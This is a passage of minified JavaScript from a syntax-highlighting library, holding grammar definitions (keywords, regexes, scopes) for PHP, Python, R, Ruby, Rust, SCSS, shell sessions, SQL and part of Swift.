\t]*(\w+)\b/,contains:e.QUOTE_STRING_MODE.contains.concat(s)}),]},d={scope:"number",variants:[{begin:"\\b0[bB][01]+(?:_[01]+)*\\b"},{begin:"\\b0[oO][0-7]+(?:_[0-7]+)*\\b"},{begin:"\\b0[xX][\\da-fA-F]+(?:_[\\da-fA-F]+)*\\b"},{begin:"(?:\\b\\d+(?:_\\d+)*(\\.(?:\\d+(?:_\\d+)*))?|\\B\\.\\d+)(?:[eE][+-]?\\d+)?"},],relevance:0},g=["false","null","true"],u=["__CLASS__","__DIR__","__FILE__","__FUNCTION__","__COMPILER_HALT_OFFSET__","__LINE__","__METHOD__","__NAMESPACE__","__TRAIT__","die","echo","exit","include","include_once","print","require","require_once","array","abstract","and","as","binary","bool","boolean","break","callable","case","catch","class","clone","const","continue","declare","default","do","double","else","elseif","empty","enddeclare","endfor","endforeach","endif","endswitch","endwhile","enum","eval","extends","final","finally","float","for","foreach","from","global","goto","if","implements","instanceof","insteadof","int","integer","interface","isset","iterable","list","match|0","mixed","new","never","object","or","private","protected","public","readonly","real","return","string","switch","throw","trait","try","unset","use","var","void","while","xor","yield",],b=["Error|0","AppendIterator","ArgumentCountError","ArithmeticError","ArrayIterator","ArrayObject","AssertionError","BadFunctionCallException","BadMethodCallException","CachingIterator","CallbackFilterIterator","CompileError","Countable","DirectoryIterator","DivisionByZeroError","DomainException","EmptyIterator","ErrorException","Exception","FilesystemIterator","FilterIterator","GlobIterator","InfiniteIterator","InvalidArgumentException","IteratorIterator","LengthException","LimitIterator","LogicException","MultipleIterator","NoRewindIterator","OutOfBoundsException","OutOfRangeException","OuterIterator","OverflowException","ParentIterator","ParseError","RangeException","RecursiveArrayIterator","RecursiveCachingIterator","RecursiveCallbackFilterIterator","RecursiveDirectoryIterator","RecursiveFilterIte
rator","RecursiveIterator","RecursiveIteratorIterator","RecursiveRegexIterator","RecursiveTreeIterator","RegexIterator","RuntimeException","SeekableIterator","SplDoublyLinkedList","SplFileInfo","SplFileObject","SplFixedArray","SplHeap","SplMaxHeap","SplMinHeap","SplObjectStorage","SplObserver","SplPriorityQueue","SplQueue","SplStack","SplSubject","SplTempFileObject","TypeError","UnderflowException","UnexpectedValueException","UnhandledMatchError","ArrayAccess","BackedEnum","Closure","Fiber","Generator","Iterator","IteratorAggregate","Serializable","Stringable","Throwable","Traversable","UnitEnum","WeakReference","WeakMap","Directory","__PHP_Incomplete_Class","parent","php_user_filter","self","static","stdClass",],m={keyword:u,literal:(e=>{let n=[];return e.forEach(e=>{n.push(e),e.toLowerCase()===e?n.push(e.toUpperCase()):n.push(e.toLowerCase())}),n})(g),built_in:b},p=e=>e.map(e=>e.replace(/\|\d+$/,"")),h={variants:[{match:[/new/,n.concat(o,"+"),n.concat("(?!",p(b).join("\\b|"),"\\b)"),i,],scope:{1:"keyword",4:"title.class"}},]},f=n.concat(a,"\\b(?!\\()"),E={variants:[{match:[n.concat(/::/,n.lookahead(/(?!class\b)/)),f],scope:{2:"variable.constant"}},{match:[/::/,/class/],scope:{2:"variable.language"}},{match:[i,n.concat(/::/,n.lookahead(/(?!class\b)/)),f],scope:{1:"title.class",3:"variable.constant"}},{match:[i,n.concat("::",n.lookahead(/(?!class\b)/))],scope:{1:"title.class"}},{match:[i,/::/,/class/],scope:{1:"title.class",3:"variable.language"}},]},$={scope:"attr",match:n.concat(a,n.lookahead(":"),n.lookahead(/(?!::)/))},y={relevance:0,begin:/\(/,end:/\)/,keywords:m,contains:[$,r,E,e.C_BLOCK_COMMENT_MODE,c,d,h]},N={relevance:0,match:[/\b/,n.concat("(?!fn\\b|function\\b|",p(u).join("\\b|"),"|",p(b).join("\\b|"),"\\b)"),a,n.concat(o,"*"),n.lookahead(/(?=\()/),],scope:{3:"title.function.invoke"},contains:[y]};y.contains.push(N);let 
w=[$,E,e.C_BLOCK_COMMENT_MODE,c,d,h];return{case_insensitive:!1,keywords:m,contains:[{begin:n.concat(/#\[\s*/,i),beginScope:"meta",end:/]/,endScope:"meta",keywords:{literal:g,keyword:["new","array"]},contains:[{begin:/\[/,end:/]/,keywords:{literal:g,keyword:["new","array"]},contains:["self",...w]},...w,{scope:"meta",match:i},]},e.HASH_COMMENT_MODE,e.COMMENT("//","$"),e.COMMENT("/\\*","\\*/",{contains:[{scope:"doctag",match:"@[A-Za-z]+"},]}),{match:/__halt_compiler\(\);/,keywords:"__halt_compiler",starts:{scope:"comment",end:e.MATCH_NOTHING_RE,contains:[{match:/\?>/,scope:"meta",endsParent:!0}]}},{scope:"meta",variants:[{begin:/<\?php/,relevance:10},{begin:/<\?=/},{begin:/<\?/,relevance:.1},{begin:/\?>/},]},{scope:"variable.language",match:/\$this\b/},r,N,E,{match:[/const/,/\s/,a],scope:{1:"keyword",3:"variable.constant"}},h,{scope:"function",relevance:0,beginKeywords:"fn function",end:/[;{]/,excludeEnd:!0,illegal:"[$%\\[]",contains:[{beginKeywords:"use"},e.UNDERSCORE_TITLE_MODE,{begin:"=>",endsParent:!0},{scope:"params",begin:"\\(",end:"\\)",excludeBegin:!0,excludeEnd:!0,keywords:m,contains:["self",r,E,e.C_BLOCK_COMMENT_MODE,c,d]},]},{scope:"class",variants:[{beginKeywords:"enum",illegal:/[($"]/},{beginKeywords:"class interface trait",illegal:/[:($"]/},],relevance:0,end:/\{/,excludeEnd:!0,contains:[{beginKeywords:"extends implements"},e.UNDERSCORE_TITLE_MODE,]},{beginKeywords:"namespace",relevance:0,end:";",illegal:/[.']/,contains:[e.inherit(e.UNDERSCORE_TITLE_MODE,{scope:"title.class"}),]},{beginKeywords:"use",relevance:0,end:";",contains:[{match:/\b(as|const|function)\b/,scope:"keyword"},e.UNDERSCORE_TITLE_MODE,]},c,d,]}},grmr_php_template:e=>({name:"PHP 
template",subLanguage:"xml",contains:[{begin:/<\?(php|=)?/,end:/\?>/,subLanguage:"php",contains:[{begin:"/\\*",end:"\\*/",skip:!0},{begin:'b"',end:'"',skip:!0},{begin:"b'",end:"'",skip:!0},e.inherit(e.APOS_STRING_MODE,{illegal:null,className:null,contains:null,skip:!0}),e.inherit(e.QUOTE_STRING_MODE,{illegal:null,className:null,contains:null,skip:!0}),]},]}),grmr_plaintext:e=>({name:"Plain text",aliases:["text","txt"],disableAutodetect:!0}),grmr_python(e){let n=e.regex,t=/[\p{XID_Start}_]\p{XID_Continue}*/u,a=["and","as","assert","async","await","break","case","class","continue","def","del","elif","else","except","finally","for","from","global","if","import","in","is","lambda","match","nonlocal|10","not","or","pass","raise","return","try","while","with","yield",],i={$pattern:/[A-Za-z]\w+|__\w+__/,keyword:a,built_in:["__import__","abs","all","any","ascii","bin","bool","breakpoint","bytearray","bytes","callable","chr","classmethod","compile","complex","delattr","dict","dir","divmod","enumerate","eval","exec","filter","float","format","frozenset","getattr","globals","hasattr","hash","help","hex","id","input","int","isinstance","issubclass","iter","len","list","locals","map","max","memoryview","min","next","object","oct","open","ord","pow","print","property","range","repr","reversed","round","set","setattr","slice","sorted","staticmethod","str","sum","super","tuple","type","vars","zip",],literal:["__debug__","Ellipsis","False","None","NotImplemented","True",],type:["Any","Callable","Coroutine","Dict","List","Literal","Generic","Optional","Sequence","Set","Tuple","Type","Union",]},r={className:"meta",begin:/^(>>>|\.\.\.) 
/},s={className:"subst",begin:/\{/,end:/\}/,keywords:i,illegal:/#/},l={begin:/\{\{/,relevance:0},o={className:"string",contains:[e.BACKSLASH_ESCAPE],variants:[{begin:/([uU]|[bB]|[rR]|[bB][rR]|[rR][bB])?'''/,end:/'''/,contains:[e.BACKSLASH_ESCAPE,r],relevance:10},{begin:/([uU]|[bB]|[rR]|[bB][rR]|[rR][bB])?"""/,end:/"""/,contains:[e.BACKSLASH_ESCAPE,r],relevance:10},{begin:/([fF][rR]|[rR][fF]|[fF])'''/,end:/'''/,contains:[e.BACKSLASH_ESCAPE,r,l,s]},{begin:/([fF][rR]|[rR][fF]|[fF])"""/,end:/"""/,contains:[e.BACKSLASH_ESCAPE,r,l,s]},{begin:/([uU]|[rR])'/,end:/'/,relevance:10},{begin:/([uU]|[rR])"/,end:/"/,relevance:10},{begin:/([bB]|[bB][rR]|[rR][bB])'/,end:/'/},{begin:/([bB]|[bB][rR]|[rR][bB])"/,end:/"/},{begin:/([fF][rR]|[rR][fF]|[fF])'/,end:/'/,contains:[e.BACKSLASH_ESCAPE,l,s]},{begin:/([fF][rR]|[rR][fF]|[fF])"/,end:/"/,contains:[e.BACKSLASH_ESCAPE,l,s]},e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,]},c="[0-9](_?[0-9])*",d=`(\\b(${c}))?\\.(${c})|\\b(${c})\\.`,g="\\b|"+a.join("|"),u={className:"number",relevance:0,variants:[{begin:`(\\b(${c})|(${d}))[eE][+-]?(${c})[jJ]?(?=${g})`},{begin:`(${d})[jJ]?`},{begin:`\\b([1-9](_?[0-9])*|0+(_?0)*)[lLjJ]?(?=${g})`},{begin:`\\b0[bB](_?[01])+[lL]?(?=${g})`},{begin:`\\b0[oO](_?[0-7])+[lL]?(?=${g})`},{begin:`\\b0[xX](_?[0-9a-fA-F])+[lL]?(?=${g})`},{begin:`\\b(${c})[jJ](?=${g})`},]},b={className:"comment",begin:n.lookahead(/# type:/),end:/$/,keywords:i,contains:[{begin:/# type:/},{begin:/#/,end:/\b\B/,endsWithParent:!0},]},m={className:"params",variants:[{className:"",begin:/\(\s*\)/,skip:!0},{begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,keywords:i,contains:["self",r,u,o,e.HASH_COMMENT_MODE]},]};return 
s.contains=[o,u,r],{name:"Python",aliases:["py","gyp","ipython"],unicodeRegex:!0,keywords:i,illegal:/(<\/|->|\?)|=>/,contains:[r,u,{begin:/\bself\b/},{beginKeywords:"if",relevance:0},o,b,e.HASH_COMMENT_MODE,{match:[/\bdef/,/\s+/,t],scope:{1:"keyword",3:"title.function"},contains:[m]},{variants:[{match:[/\bclass/,/\s+/,t,/\s*/,/\(\s*/,t,/\s*\)/]},{match:[/\bclass/,/\s+/,t]},],scope:{1:"keyword",3:"title.class",6:"title.class.inherited"}},{className:"meta",begin:/^[\t ]*@/,end:/(?=#)|$/,contains:[u,m,o]},]}},grmr_python_repl:e=>({aliases:["pycon"],contains:[{className:"meta.prompt",starts:{end:/ |$/,starts:{end:"$",subLanguage:"python"}},variants:[{begin:/^>>>(?=[ ]|$)/},{begin:/^\.\.\.(?=[ ]|$)/},]},]}),grmr_r(e){let n=e.regex,t=/(?:(?:[a-zA-Z]|\.[._a-zA-Z])[._a-zA-Z0-9]*)|\.(?!\d)/,a=n.either(/0[xX][0-9a-fA-F]+\.[0-9a-fA-F]*[pP][+-]?\d+i?/,/0[xX][0-9a-fA-F]+(?:[pP][+-]?\d+)?[Li]?/,/(?:\d+(?:\.\d*)?|\.\d+)(?:[eE][+-]?\d+)?[Li]?/),i=/[=!<>:]=|\|\||&&|:::?|<-|<<-|->>|->|\|>|[-+*\/?!$&|:<=>@^~]|\*\*/,r=n.either(/[()]/,/[{}]/,/\[\[/,/[[\]]/,/\\/,/,/);return{name:"R",keywords:{$pattern:t,keyword:"function if in break next repeat else for while",literal:"NULL NA TRUE FALSE Inf NaN NA_integer_|10 NA_real_|10 NA_character_|10 NA_complex_|10",built_in:"LETTERS letters month.abb month.name pi T F abs acos acosh all any anyNA Arg as.call as.character as.complex as.double as.environment as.integer as.logical as.null.default as.numeric as.raw asin asinh atan atanh attr attributes baseenv browser c call ceiling class Conj cos cosh cospi cummax cummin cumprod cumsum digamma dim dimnames emptyenv exp expression floor forceAndCall gamma gc.time globalenv Im interactive invisible is.array is.atomic is.call is.character is.complex is.double is.environment is.expression is.finite is.function is.infinite is.integer is.language is.list is.logical is.matrix is.na is.name is.nan is.null is.numeric is.object is.pairlist is.raw is.recursive is.single is.symbol lazyLoadDBfetch length lgamma 
list log max min missing Mod names nargs nzchar oldClass on.exit pos.to.env proc.time prod quote range Re rep retracemem return round seq_along seq_len seq.int sign signif sin sinh sinpi sqrt standardGeneric substitute sum switch tan tanh tanpi tracemem trigamma trunc unclass untracemem UseMethod xtfrm"},contains:[e.COMMENT(/#'/,/$/,{contains:[{scope:"doctag",match:/@examples/,starts:{end:n.lookahead(n.either(/\n^#'\s*(?=@[a-zA-Z]+)/,/\n^(?!#')/)),endsParent:!0}},{scope:"doctag",begin:"@param",end:/$/,contains:[{scope:"variable",variants:[{match:t},{match:/`(?:\\.|[^`\\])+`/}],endsParent:!0},]},{scope:"doctag",match:/@[a-zA-Z]+/},{scope:"keyword",match:/\\[a-zA-Z]+/},]}),e.HASH_COMMENT_MODE,{scope:"string",contains:[e.BACKSLASH_ESCAPE],variants:[e.END_SAME_AS_BEGIN({begin:/[rR]"(-*)\(/,end:/\)(-*)"/}),e.END_SAME_AS_BEGIN({begin:/[rR]"(-*)\{/,end:/\}(-*)"/}),e.END_SAME_AS_BEGIN({begin:/[rR]"(-*)\[/,end:/\](-*)"/}),e.END_SAME_AS_BEGIN({begin:/[rR]'(-*)\(/,end:/\)(-*)'/}),e.END_SAME_AS_BEGIN({begin:/[rR]'(-*)\{/,end:/\}(-*)'/}),e.END_SAME_AS_BEGIN({begin:/[rR]'(-*)\[/,end:/\](-*)'/}),{begin:'"',end:'"',relevance:0},{begin:"'",end:"'",relevance:0},]},{relevance:0,variants:[{scope:{1:"operator",2:"number"},match:[i,a]},{scope:{1:"operator",2:"number"},match:[/%[^%]*%/,a]},{scope:{1:"punctuation",2:"number"},match:[r,a]},{scope:{2:"number"},match:[/[^a-zA-Z0-9._]|^/,a]},]},{scope:{3:"operator"},match:[t,/\s+/,/<-/,/\s+/]},{scope:"operator",relevance:0,variants:[{match:i},{match:/%[^%]*%/},]},{scope:"punctuation",relevance:0,match:r},{begin:"`",end:"`",contains:[{begin:/\\./}]},]}},grmr_ruby(e){let 
n=e.regex,t="([a-zA-Z_]\\w*[!?=]?|[-+~]@|<<|>>|=~|===?|<=>|[<>]=?|\\*\\*|[-/+%^&*~`|]|\\[\\]=?)",a=n.either(/\b([A-Z]+[a-z0-9]+)+/,/\b([A-Z]+[a-z0-9]+)+[A-Z]+/),i=n.concat(a,/(::\w+)*/),r={"variable.constant":["__FILE__","__LINE__","__ENCODING__"],"variable.language":["self","super"],keyword:["alias","and","begin","BEGIN","break","case","class","defined","do","else","elsif","end","END","ensure","for","if","in","module","next","not","or","redo","require","rescue","retry","return","then","undef","unless","until","when","while","yield","include","extend","prepend","public","private","protected","raise","throw",],built_in:["proc","lambda","attr_accessor","attr_reader","attr_writer","define_method","private_constant","module_function",],literal:["true","false","nil"]},s={className:"doctag",begin:"@[A-Za-z]+"},l={begin:"#<",end:">"},o=[e.COMMENT("#","$",{contains:[s]}),e.COMMENT("^=begin","^=end",{contains:[s],relevance:10}),e.COMMENT("^__END__",e.MATCH_NOTHING_RE),],c={className:"subst",begin:/#\{/,end:/\}/,keywords:r},d={className:"string",contains:[e.BACKSLASH_ESCAPE,c],variants:[{begin:/'/,end:/'/},{begin:/"/,end:/"/},{begin:/`/,end:/`/},{begin:/%[qQwWx]?\(/,end:/\)/},{begin:/%[qQwWx]?\[/,end:/\]/},{begin:/%[qQwWx]?\{/,end:/\}/},{begin:/%[qQwWx]?/},{begin:/%[qQwWx]?\//,end:/\//},{begin:/%[qQwWx]?%/,end:/%/},{begin:/%[qQwWx]?-/,end:/-/},{begin:/%[qQwWx]?\|/,end:/\|/},{begin:/\B\?(\\\d{1,3})/},{begin:/\B\?(\\x[A-Fa-f0-9]{1,2})/},{begin:/\B\?(\\u\{?[A-Fa-f0-9]{1,6}\}?)/},{begin:/\B\?(\\M-\\C-|\\M-\\c|\\c\\M-|\\M-|\\C-\\M-)[\x20-\x7e]/},{begin:/\B\?\\(c|C-)[\x20-\x7e]/},{begin:/\B\?\\?\S/},{begin:n.concat(/<<[-~]?'?/,n.lookahead(/(\w+)(?=\W)[^\n]*\n(?:[^\n]*\n)*?\s*\1\b/)),contains:[e.END_SAME_AS_BEGIN({begin:/(\w+)/,end:/(\w+)/,contains:[e.BACKSLASH_ESCAPE,c]}),]},]},g="[0-9](_?[0-9])*",u={className:"number",relevance:0,variants:[{begin:`\\b([1-9](_?[0-9])*|0)(\\.(${g}))?([eE][+-]?(${g})|r)?i?\\b`},{begin:"\\b0[dD][0-9](_?[0-9])*r?i?\\b"},{begin:"\\b0[bB][0-1](_?[0-1])*r
?i?\\b"},{begin:"\\b0[oO][0-7](_?[0-7])*r?i?\\b"},{begin:"\\b0[xX][0-9a-fA-F](_?[0-9a-fA-F])*r?i?\\b"},{begin:"\\b0(_?[0-7])+r?i?\\b"},]},b={variants:[{match:/\(\)/},{className:"params",begin:/\(/,end:/(?=\))/,excludeBegin:!0,endsParent:!0,keywords:r},]},m=[d,{variants:[{match:[/class\s+/,i,/\s+<\s+/,i]},{match:[/\b(class|module)\s+/,i]},],scope:{2:"title.class",4:"title.class.inherited"},keywords:r},{match:[/(include|extend)\s+/,i],scope:{2:"title.class"},keywords:r},{relevance:0,match:[i,/\.new[. (]/],scope:{1:"title.class"}},{relevance:0,match:/\b[A-Z][A-Z_0-9]+\b/,className:"variable.constant"},{relevance:0,match:a,scope:"title.class"},{match:[/def/,/\s+/,t],scope:{1:"keyword",3:"title.function"},contains:[b]},{begin:e.IDENT_RE+"::"},{className:"symbol",begin:e.UNDERSCORE_IDENT_RE+"(!|\\?)?:",relevance:0},{className:"symbol",begin:":(?!\\s)",contains:[d,{begin:t}],relevance:0},u,{className:"variable",begin:"(\\$\\W)|((\\$|@@?)(\\w+))(?=[^@$?])(?![A-Za-z])(?![@$?'])"},{className:"params",begin:/\|/,end:/\|/,excludeBegin:!0,excludeEnd:!0,relevance:0,keywords:r},{begin:"("+e.RE_STARTERS_RE+"|unless)\\s*",keywords:"unless",contains:[{className:"regexp",contains:[e.BACKSLASH_ESCAPE,c],illegal:/\n/,variants:[{begin:"/",end:"/[a-z]*"},{begin:/%r\{/,end:/\}[a-z]*/},{begin:"%r\\(",end:"\\)[a-z]*"},{begin:"%r!",end:"![a-z]*"},{begin:"%r\\[",end:"\\][a-z]*"},]},].concat(l,o),relevance:0},].concat(l,o);return c.contains=m,b.contains=m,o.unshift(l),{name:"Ruby",aliases:["rb","gemspec","podspec","thor","irb"],keywords:r,illegal:/\/\*/,contains:[e.SHEBANG({binary:"ruby"})].concat([{begin:/^\s*=>/,starts:{end:"$",contains:m}},{className:"meta.prompt",begin:"^([>?]>|[\\w#]+\\(\\w+\\):\\d+:\\d+[>*]|(\\w+-)?\\d+\\.\\d+\\.\\d+(p\\d+)?[^\\d][^>]+>)(?=[ ])",starts:{end:"$",keywords:r,contains:m}},]).concat(o).concat(m)}},grmr_rust(e){let 
n=e.regex,t={className:"title.function.invoke",relevance:0,begin:n.concat(/\b/,/(?!let\b)/,e.IDENT_RE,n.lookahead(/\s*\(/))},a="([ui](8|16|32|64|128|size)|f(32|64))?",i=["drop ","Copy","Send","Sized","Sync","Drop","Fn","FnMut","FnOnce","ToOwned","Clone","Debug","PartialEq","PartialOrd","Eq","Ord","AsRef","AsMut","Into","From","Default","Iterator","Extend","IntoIterator","DoubleEndedIterator","ExactSizeIterator","SliceConcatExt","ToString","assert!","assert_eq!","bitflags!","bytes!","cfg!","col!","concat!","concat_idents!","debug_assert!","debug_assert_eq!","env!","panic!","file!","format!","format_args!","include_bytes!","include_str!","line!","local_data_key!","module_path!","option_env!","print!","println!","select!","stringify!","try!","unimplemented!","unreachable!","vec!","write!","writeln!","macro_rules!","assert_ne!","debug_assert_ne!",],r=["i8","i16","i32","i64","i128","isize","u8","u16","u32","u64","u128","usize","f32","f64","str","char","bool","Box","Option","Result","String","Vec",];return{name:"Rust",aliases:["rs"],keywords:{$pattern:e.IDENT_RE+"!?",type:r,keyword:["abstract","as","async","await","become","box","break","const","continue","crate","do","dyn","else","enum","extern","false","final","fn","for","if","impl","in","let","loop","macro","match","mod","move","mut","override","priv","pub","ref","return","self","Self","static","struct","super","trait","true","try","type","typeof","unsafe","unsized","use","virtual","where","while","yield",],literal:["true","false","Some","None","Ok","Err"],built_in:i},illegal:""},t,]}},grmr_scss(e){let 
n=X(e),t="@[a-z-]+",a={className:"variable",begin:"(\\$[a-zA-Z-][a-zA-Z0-9_-]*)\\b",relevance:0};return{name:"SCSS",case_insensitive:!0,illegal:"[=/|']",contains:[e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,n.CSS_NUMBER_MODE,{className:"selector-id",begin:"#[A-Za-z0-9_-]+",relevance:0},{className:"selector-class",begin:"\\.[A-Za-z0-9_-]+",relevance:0},n.ATTRIBUTE_SELECTOR_MODE,{className:"selector-tag",begin:"\\b("+V.join("|")+")\\b",relevance:0},{className:"selector-pseudo",begin:":("+Y.join("|")+")"},{className:"selector-pseudo",begin:":(:)?("+ee.join("|")+")"},a,{begin:/\(/,end:/\)/,contains:[n.CSS_NUMBER_MODE]},n.CSS_VARIABLE,{className:"attribute",begin:"\\b("+en.join("|")+")\\b"},{begin:"\\b(whitespace|wait|w-resize|visible|vertical-text|vertical-ideographic|uppercase|upper-roman|upper-alpha|underline|transparent|top|thin|thick|text|text-top|text-bottom|tb-rl|table-header-group|table-footer-group|sw-resize|super|strict|static|square|solid|small-caps|separate|se-resize|scroll|s-resize|rtl|row-resize|ridge|right|repeat|repeat-y|repeat-x|relative|progress|pointer|overline|outside|outset|oblique|nowrap|not-allowed|normal|none|nw-resize|no-repeat|no-drop|newspaper|ne-resize|n-resize|move|middle|medium|ltr|lr-tb|lowercase|lower-roman|lower-alpha|loose|list-item|line|line-through|line-edge|lighter|left|keep-all|justify|italic|inter-word|inter-ideograph|inside|inset|inline|inline-block|inherit|inactive|ideograph-space|ideograph-parenthesis|ideograph-numeric|ideograph-alpha|horizontal|hidden|help|hand|groove|fixed|ellipsis|e-resize|double|dotted|distribute|distribute-space|distribute-letter|distribute-all-lines|disc|disabled|default|decimal|dashed|crosshair|collapse|col-resize|circle|char|center|capitalize|break-word|break-all|bottom|both|bolder|bold|block|bidi-override|below|baseline|auto|always|all-scroll|absolute|table|table-cell)\\b"},{begin:/:/,end:/[;}{]/,relevance:0,contains:[n.BLOCK_COMMENT,a,n.HEXCOLOR,n.CSS_NUMBER_MODE,e.QUOTE_STRING_MODE,e.APOS_STRING_MODE,
n.IMPORTANT,n.FUNCTION_DISPATCH,]},{begin:"@(page|font-face)",keywords:{$pattern:t,keyword:"@page @font-face"}},{begin:"@",end:"[{;]",returnBegin:!0,keywords:{$pattern:/[a-z-]+/,keyword:"and or not only",attribute:J.join(" ")},contains:[{begin:t,className:"keyword"},{begin:/[a-z-]+(?=:)/,className:"attribute"},a,e.QUOTE_STRING_MODE,e.APOS_STRING_MODE,n.HEXCOLOR,n.CSS_NUMBER_MODE,]},n.FUNCTION_DISPATCH,]}},grmr_shell:e=>({name:"Shell Session",aliases:["console","shellsession"],contains:[{className:"meta.prompt",begin:/^\s{0,3}[/~\w\d[\]()@-]*[>%$#][ ]?/,starts:{end:/[^\\](?=\s*$)/,subLanguage:"bash"}},]}),grmr_sql(e){let n=e.regex,t=e.COMMENT("--","$"),a=["true","false","unknown"],i=["bigint","binary","blob","boolean","char","character","clob","date","dec","decfloat","decimal","float","int","integer","interval","nchar","nclob","national","numeric","real","row","smallint","time","timestamp","varchar","varying","varbinary",],r=["abs","acos","array_agg","asin","atan","avg","cast","ceil","ceiling","coalesce","corr","cos","cosh","count","covar_pop","covar_samp","cume_dist","dense_rank","deref","element","exp","extract","first_value","floor","json_array","json_arrayagg","json_exists","json_object","json_objectagg","json_query","json_table","json_table_primitive","json_value","lag","last_value","lead","listagg","ln","log","log10","lower","max","min","mod","nth_value","ntile","nullif","percent_rank","percentile_cont","percentile_disc","position","position_regex","power","rank","regr_avgx","regr_avgy","regr_count","regr_intercept","regr_r2","regr_slope","regr_sxx","regr_sxy","regr_syy","row_number","sin","sinh","sqrt","stddev_pop","stddev_samp","substring","substring_regex","sum","tan","tanh","translate","translate_regex","treat","trim","trim_array","unnest","upper","value_of","var_pop","var_samp","width_bucket",],s=["create table","insert into","primary key","foreign key","not null","alter table","add constraint","grouping sets","on overflow","character set","respect 
nulls","ignore nulls","nulls first","nulls last","depth first","breadth first",],l=r,o=["abs","acos","all","allocate","alter","and","any","are","array","array_agg","array_max_cardinality","as","asensitive","asin","asymmetric","at","atan","atomic","authorization","avg","begin","begin_frame","begin_partition","between","bigint","binary","blob","boolean","both","by","call","called","cardinality","cascaded","case","cast","ceil","ceiling","char","char_length","character","character_length","check","classifier","clob","close","coalesce","collate","collect","column","commit","condition","connect","constraint","contains","convert","copy","corr","corresponding","cos","cosh","count","covar_pop","covar_samp","create","cross","cube","cume_dist","current","current_catalog","current_date","current_default_transform_group","current_path","current_role","current_row","current_schema","current_time","current_timestamp","current_path","current_role","current_transform_group_for_type","current_user","cursor","cycle","date","day","deallocate","dec","decimal","decfloat","declare","default","define","delete","dense_rank","deref","describe","deterministic","disconnect","distinct","double","drop","dynamic","each","element","else","empty","end","end_frame","end_partition","end-exec","equals","escape","every","except","exec","execute","exists","exp","external","extract","false","fetch","filter","first_value","float","floor","for","foreign","frame_row","free","from","full","function","fusion","get","global","grant","group","grouping","groups","having","hold","hour","identity","in","indicator","initial","inner","inout","insensitive","insert","int","integer","intersect","intersection","interval","into","is","join","json_array","json_arrayagg","json_exists","json_object","json_objectagg","json_query","json_table","json_table_primitive","json_value","lag","language","large","last_value","lateral","lead","leading","left","like","like_regex","listagg","ln","local","localtime","localtimestamp","log"
,"log10","lower","match","match_number","match_recognize","matches","max","member","merge","method","min","minute","mod","modifies","module","month","multiset","national","natural","nchar","nclob","new","no","none","normalize","not","nth_value","ntile","null","nullif","numeric","octet_length","occurrences_regex","of","offset","old","omit","on","one","only","open","or","order","out","outer","over","overlaps","overlay","parameter","partition","pattern","per","percent","percent_rank","percentile_cont","percentile_disc","period","portion","position","position_regex","power","precedes","precision","prepare","primary","procedure","ptf","range","rank","reads","real","recursive","ref","references","referencing","regr_avgx","regr_avgy","regr_count","regr_intercept","regr_r2","regr_slope","regr_sxx","regr_sxy","regr_syy","release","result","return","returns","revoke","right","rollback","rollup","row","row_number","rows","running","savepoint","scope","scroll","search","second","seek","select","sensitive","session_user","set","show","similar","sin","sinh","skip","smallint","some","specific","specifictype","sql","sqlexception","sqlstate","sqlwarning","sqrt","start","static","stddev_pop","stddev_samp","submultiset","subset","substring","substring_regex","succeeds","sum","symmetric","system","system_time","system_user","table","tablesample","tan","tanh","then","time","timestamp","timezone_hour","timezone_minute","to","trailing","translate","translate_regex","translation","treat","trigger","trim","trim_array","true","truncate","uescape","union","unique","unknown","unnest","update","upper","user","using","value","values","value_of","var_pop","var_samp","varbinary","varchar","varying","versioning","when","whenever","where","width_bucket","window","with","within","without","year","add","asc","collation","desc","final","first","last","view",].filter(e=>!r.includes(e)),c={begin:n.concat(/\b/,n.either(...l),/\s*\(/),relevance:0,keywords:{built_in:l}};return{name:"SQL",case_insensitive:!0
,illegal:/[{}]|<\//,keywords:{$pattern:/\b[\w\.]+/,keyword:((e,{exceptions:n,when:t}={})=>{let a=t;return n=n||[],e.map(e=>e.match(/\|\d+$/)||n.includes(e)?e:a(e)?e+"|0":e)})(o,{when:e=>e.length<3}),literal:a,type:i,built_in:["current_catalog","current_date","current_default_transform_group","current_path","current_role","current_schema","current_transform_group_for_type","current_user","session_user","system_time","system_user","current_time","localtime","current_timestamp","localtimestamp",]},contains:[{begin:n.either(...s),relevance:0,keywords:{$pattern:/[\w\.]+/,keyword:o.concat(s),literal:a,type:i}},{className:"type",begin:n.either("double precision","large object","with timezone","without timezone")},c,{className:"variable",begin:/@[a-z0-9]+/},{className:"string",variants:[{begin:/'/,end:/'/,contains:[{begin:/''/}]},]},{begin:/"/,end:/"/,contains:[{begin:/""/},]},e.C_NUMBER_MODE,e.C_BLOCK_COMMENT_MODE,t,{className:"operator",begin:/[-+*/=%^~]|&&?|\|\|?|!=?|<(?:=>?|<|>)?|>[>=]?/,relevance:0},]}},grmr_swift(e){let n={match:/\s+/,relevance:0},t=e.COMMENT("/\\*","\\*/",{contains:["self"]}),a=[e.C_LINE_COMMENT_MODE,t],i={match:[/\./,p(...e8,...eh)],className:{2:"keyword"}},r={match:m(/\./,p(...eE)),relevance:0},s=eE.filter(e=>"string"==typeof e).concat(["_|0"]),l={variants:[{className:"keyword",match:p(...eE.filter(e=>"string"!=typeof 
e).concat(ef).map(ep),...eh)},]},o={$pattern:p(/\b\w+/,/#\w+/),keyword:s.concat(eN),literal:e$},c=[i,r,l],d=[{match:m(/\./,p(...ew)),relevance:0},{className:"built_in",match:m(/\b/,p(...ew),/(?=\()/)},],u={match:/->/,relevance:0},b=[u,{className:"operator",relevance:0,variants:[{match:ek},{match:`\\.(\\.|${ex})+`}]},],h="([0-9a-fA-F]_*)+",f={className:"number",relevance:0,variants:[{match:"\\b(([0-9]_*)+)(\\.(([0-9]_*)+))?([eE][+-]?(([0-9]_*)+))?\\b"},{match:`\\b0x(${h})(\\.(${h}))?([pP][+-]?(([0-9]_*)+))?\\b`},{match:/\b0o([0-7]_*)+\b/},{match:/\b0b([01]_*)+\b/},]},E=(e="")=>({className:"subst",variants:[{match:m(/\\/,e,/[0\\tnr"']/)},{match:m(/\\/,e,/u\{[0-9a-fA-F]{1,8}\}/)},]}),$=(e="")=>({className:"subst",match:m(/\\/,e,/[\t 